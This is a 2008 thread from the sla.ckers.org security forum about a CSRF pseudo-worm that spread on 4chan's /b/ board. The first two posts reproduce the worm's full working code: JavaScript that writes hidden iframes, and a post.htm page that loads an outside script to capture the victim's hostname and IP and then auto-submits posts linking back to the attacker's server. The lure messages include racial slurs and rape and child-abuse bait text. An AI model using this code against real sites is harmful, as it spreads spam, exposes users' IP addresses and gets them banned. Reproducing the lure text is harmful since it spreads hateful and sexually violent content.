Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A on cross site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For Session, fixations, hijacking, lockout, replay, session riding etc.... 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
CSRF pseudo-worm propagating on 4chan
Posted by: Skuld
Date: February 18, 2008 02:45PM

If any of you ever go to 4chans /b/ board, you might find this interesting. There is at this moment a pseudo-worm propagating on /b/ using csrf and social engineering to spread. Here is the code it's using.

var list = [];
list[0] = "Read_about_Scientology's_'secular_book_of_morals'_recruitment_program_from_their_own_documents.";
list[1] = "Truth_be_known,_those_silly_MooSlimes_sure_do_like_their_lil_boys:";
list[2] = "Truly,_the_COLD-HEARTED_BASTARD_christian_god_is_one_sick_fuck.";
list[3] = "This_is_not_a_joke:_Mike_Huckabee_confesses_to_eating_fried_squirrel_(rodent!!!!!!!!!)";
list[4] = "Holly_cow!__This_is_very_very_scary.";
list[5] = "I_am_concerned_about__Zayn_Gil's_activities.__He_has_bomb_instructions_on_the_net:";
list[6] = "I_never_thought_I'd_say_it,_but_this_shit_has_gone_TOO_FAR:";
list[7] = "This_is_amazing.__I_couldn't_stop_laughing.";
list[8] = "Anonymous_delivers:";
list[9] = "Watch_the_video!";
list[10] = "You_people_joke_about_rape,_but_look_at_what_was_done_to_this_poor_woman:";
list[11] = "Here's_some_footage_from_our_local_KKK_meeting_in_which_we_lynched_some_no-good_niggers:";
list[12] = "it's_not_rape_if_you_kill_her_first";
list[13] = "Leaked_footage_of_young_girl_being_sexually_abused_and_murdered:";
list[14] = "They_say_the_best_gift_you_can_give_to_a_woman_is_the_gift_of_RAEP:";
list[15] = "This_is_what_rape_really_looks_like.__I_hope_you_feel_good_about_yourselves.";

var thread = parseInt( location.href.match(/t=\d+/)[0].match(/\d+/)[0] );
var comment = parseInt( location.href.match(/c=\d+/)[0].match(/\d+/)[0] );
if (Math.random()*3 < 1) comment = list.length;
if (comment >= list.length) comment = Math.floor(Math.random()*list.length);

var i;
thread = thread + Math.floor(Math.random()*1000); // reduced from 1000 to 500 for 7chan
for (i = 0; i < 50; i++) {
document.write( "<iframe src=\"post.htm?t=" );
document.write( thread + i );
document.write( "&c=" + comment );
document.write( "&m=" + list[comment] );
document.write( "\" height=0 width=0></iframe>" );
}

Options: ReplyQuote
Re: CSRF pseudo-worm propagating on 4chan
Posted by: Skuld
Date: February 18, 2008 02:49PM

Here is post.htm.

<script language="JavaScript" src="http://scripts.hashemian.com/js/visitorIPHOST.js.php"></script>
<script type="text/javascript" language="Javascript"><!--
document.write("<fo"+"rm name='post' action='http://dat.4chan.org/b/imgboard.php' method='POST' enctype='multipart/form-data'>"
+"<input type=hidden name=resto>"
+"<input type=hidden name=email>"
+"<input type=hidden name=com>"
+"<input type=hidden name=mode value='regist'>"
+"</form>");
var args = location.href.match(/t=\d+&c=\d+/)[0];
var msg = location.href.match(/m=.*/)[0].substring(2).replace(/_/g," ");
post.resto.value = args.match(/\d+/)[0];
post.email.value = VIH_HostName + " (" + VIH_HostIP + ")";
post.com.value = msg + "\n\nhttp://204.2.183.2/thetragicreality2008/?" + args;
post.submit();
//--></script>

Options: ReplyQuote
Re: CSRF pseudo-worm propagating on 4chan
Posted by: ZeroJack
Date: February 19, 2008 01:14AM

Yup, It was created by someone from 711chan, but seems to be gone now.

There is a new one that attempts to spam 4chanarchive requests resulting in a ban.

It is a tinyurl that links to http://www.geocities.com/antianonymous08 which uses the same method as above.

Options: ReplyQuote
Re: CSRF pseudo-worm propagating on 4chan
Posted by: asilvermtzion
Date: June 25, 2008 02:52AM

lol at some of the posts, how were they injecting that?

Options: ReplyQuote


Sorry, only registered users may post in this forum.